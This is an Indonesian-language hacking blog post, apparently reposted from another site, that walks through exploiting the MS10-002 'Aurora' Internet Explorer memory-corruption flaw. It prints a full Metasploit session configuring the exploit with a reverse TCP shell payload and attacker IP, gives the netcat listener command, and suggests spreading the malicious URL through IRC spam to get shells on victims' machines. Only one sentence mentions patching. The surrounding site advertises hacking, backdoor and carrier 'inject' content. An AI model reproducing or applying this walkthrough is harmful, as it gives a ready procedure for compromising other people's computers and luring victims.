• About
  • Sitemap
  • Privacy Policy
  • Disclaimer
  • Contact

ICHAL CYBER BLOG | HANYA SEORANG MANUSIA BIASA YANG HAUS ILMU PENGETAHUAN

DRIVER PC,LAPTOP,NOTEBOOK,SOFTWARE, GAMES, WINDOWS, MOVIES, BACKTRACK, FREE GPRS, TELKOMSEL, INDOSAT, THREE, AXIS, XL, SMART, FREN, JAVA, SIS, SISX, PYTHON, HACKING, DEFACE, DLL

  • Home
  • INJEK / DIRECT
    • XL
    • THREE
    • INDOSAT
    • AXIS
    • TELKOMSEL
    • CDMA
  • VPS / SSH
    • PORT 80
    • PORT 22
    • PORT 143
    • PORT 443
  • SOFTWARE
    • EDITOR
    • VIDIO
    • AUDIO
    • FORMATER
    • VISUAL BASIC
    • WINDOWS
  • WINDOWS / LINUX
    • WNDOWS 7
    • WINDOWS 8
    • WINDOWS 8.1
    • LINUX
    • UBUNTU
    • BACKTRACK
  • MOVIES
    • ACTIONS
    • DRAMA
    • KOMEDI
    • HORROR
    • ROMANTIS
    • ADULT 21+
  • HACKING
    • SHELL
    • ADMIN PASSWORD
    • BRUTE FORCE
    • SYMLINK
    • ROOT SERVER
    • BACKDOOR
  • TUTORIAL
    • PHOTOSHOP
    • VISUAL BASIC
    • DELPHI 7
    • PYTHON
    • PERL
    • JAVA

.

Memuat...
Home » TUTORIAL » Teknik menggunakan reverse TCP untuk mendapatkan shell dengan memanfaatkan celah pada browser

Teknik menggunakan reverse TCP untuk mendapatkan shell dengan memanfaatkan celah pada browser

Sebenarnya ini teknik lama yang cukup populer di jaman dulu tapi tidak ada salahnya penulis membahasnya. Umumnya target dengan celah keamanan browser  adalah salah satu sasaran empuk untuk dimanfaatkan oleh peretas, apalagi yang masih menggunakan Internet explorer, bahkan Internet explorer 8 dengan Windows 7 pun tidak kalah terancamnya untuk diobok-obok, dimana penulis telah membuat tutorialnya tahun lalu di http://blog.xcode.or.id/?p=209. Disini penulis contohkan saja bagi pengguna Windows XP SP2 atau SP3 yang masih menggunakan IE 6, dimana begitu mudah diexploitasi dengan celah memory corruption yang ada pada komponen “Operation Aurora”, Microsoft merilis bulletinnya tentang ini pada bulan Januari 2010 di http://technet.microsoft.com/en-us/security/bulletin/ms10-jan. Disini penulis langsung saja contoh mempraktekkannya di lingkungan LAN.
Dalam Metasloit Framework :
_———.
.’ #######   ;.”
.—,.    ;@             @@`;   .—,..
.” @@@@@’.,’@@            @@@@@’,.’@@@@ “.
‘-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .’
“–’.@@@  -.@        @ ,’-   .’–”
“.@’ ; @       @ `.  ;’
|@@@@ @@@     @    .
‘ @@@ @@   @@    ,
`.@@@@    @@   .
‘,@@     @   ;           _____________
(   3 C    )     /|___ / Metasploit! \
;@’. __*__,.”    \|— \_____________/
‘(.,….”/
=[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ — –=[ 717 exploits - 361 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13462 updated 303 days ago (2011.08.01)
Warning: This copy of the Metasploit Framework was last updated 303 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
msf  exploit(ms10_002_aurora) > use exploit/windows/browser/ms10_002_aurora
msf  exploit(ms10_002_aurora) > set PAYLOAD generic/shell_reverse_tcp
msf  exploit(ms10_002_aurora) > set LHOST 192.168.1.3
msf  exploit(ms10_002_aurora) > set SRVPORT 80
PAYLOAD => generic/shell_reverse_tcp
LHOST => 192.168.1.3
SRVPORT => 80
msf  exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
msf  exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
[-] Handler failed to bind to 192.168.1.3:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://192.168.1.79:80/
[*] Server started.
[*] Sending Internet Explorer “Aurora” Memory Corruption to client 192.168.1.79
Disini LHOST IP-nya 192.168.1.3 adalah komputer attacker, dengan konsep reverse maka korban akan mengkoneksikkan diri ke komputer attacker setelah menjalankan exploit, jika target attacker di internet ya cukup attacker memasukkan IP Publiknya.
IP 192.168.1.79 adalah ip dimana attacker menjalankan metasploit frameworknya, disini pas kebetulan berbeda IP antara komputer attacker dengan komputer yang untuk menjalankan metasploit framework.
Sebelum proses exploitasi dilakukan maka attacker menjalankan terlebih dahulu netcat untuk siap menerima koneksi dari target ketika target menjalankan exploit dengan menggunakan browser.
Perintahnya : nc -l -v -p 4444
Ketika target membuka http://192.168.1.79 seperti dibawah ini maka browser target menjalankankan exploit yang ada di komputer dengan IP 192.168.1.79.


Dengan sebelumnya attacker telah menjalankan netcat maka attacker akan langsung mendapatkan shell target setelah target menjalankan url tersebut. Untuk pengamanan pada IE anda dapat melakukan update pada IE versi terbaru yang tidak memilih celah remote seperti diatas.
Untuk selain IE juga ada yang lain seperti Mozilla Firefox, chrome, opera, safari dan sebagainya yang dapat anda cari sendiri di situs exploit-db.com
Untuk IE celah ini dapat dimanfaatkan attacker di server-server Internet Relay Chat berupa spam yang isinya exploit, karena ketika client pengguna mIRC di Windows menjalankan spam dengan double klik pada url maka yang dibuka otomatis adalah IE untuk menjalankan url tersebut, karena itu jangan pernah meremehkan IE yang ada di komputer anda meskipun anda berkeyakinan tidak akan membuka situs menggunakan IE karena IE dapat membuka situs otomatis tanpa anda minta menggunakan IE seperti kasus yang saya sampaikan diatas.
Sumber: blog.xcode.or.id
Posted by Ichal Bocah Catroxs on Senin, 25 Juni 2012 - Rating: 4.5
Title : Teknik menggunakan reverse TCP untuk mendapatkan shell dengan memanfaatkan celah pada browser
Description : Sebenarnya ini teknik lama yang cukup populer di jaman dulu tapi tidak ada salahnya penulis membahasnya. Umumnya target dengan celah keam...

Share to

Facebook Google+ Twitter

0 Response to "Teknik menggunakan reverse TCP untuk mendapatkan shell dengan memanfaatkan celah pada browser"

Posting Komentar

Posting Lebih Baru
Posting Lama
Beranda
Langganan: Posting Komentar (Atom)

Yahoo Messenger

ShoutBox

Entri Populer

  • Driver Toshiba Satellite C800 untuk Windows 7 32bit / x86
    Pratinjau sekejap Toshiba Satellite C800: Toshiba Satellite C800 memang sangat cocok buat anda yang mendambakan sebuah laptop harga terja...
  • [Driver] Axioo Neon CLW 3.522 Driver Dan Notebook Spesifikasi
    Pratinjau sekejab Axioo Neon CLW 3.522 : Laptop ini hadir dengan layar 12.1 inci dan mengusung teknologi intel prosssesor core i3.Buat an...
  • [Driver] Axioo Neon CLW 5.F20 Driver Dan Notebook Spesifikasi
    Pratinjau sekejab Axioo Neon CLW 5.F20 : Laptop ini hadir dengan layar 12.1 inci dan mengusung teknologi intel prosssesor core i5.Buat and...
  • Inject Indosat No Paket,Axis,Telkomsel,XL,Tri AON 11 Mei 2014
    Pada tanggal 11 Mei 2014 saya akan menshare Indosat yaitu Multi Kewer 1.3-1 ( New Version ) yang dibuat oleh Ifan Glewo untuk mendownload kl...

Label

  • DRIVER PC
  • GAMES
  • HACKING
  • INJECT DIRECT
  • PHREAKING
  • SOFTWARE
  • SSH VPS
  • TUTORIAL
  • WINDOWS

Random Post


WWW.JIBEG.TK

WWW.JIBEG.TK
PING


#
#

Please Bantu Saya, Like This !!!

×

Powered By Blog

Copyright © 2010 ICHAL CYBER BLOG | HANYA SEORANG MANUSIA BIASA YANG HAUS ILMU PENGETAHUAN - All Rights Reserved
Design by ICHAL SCUMET - Powered by Blogger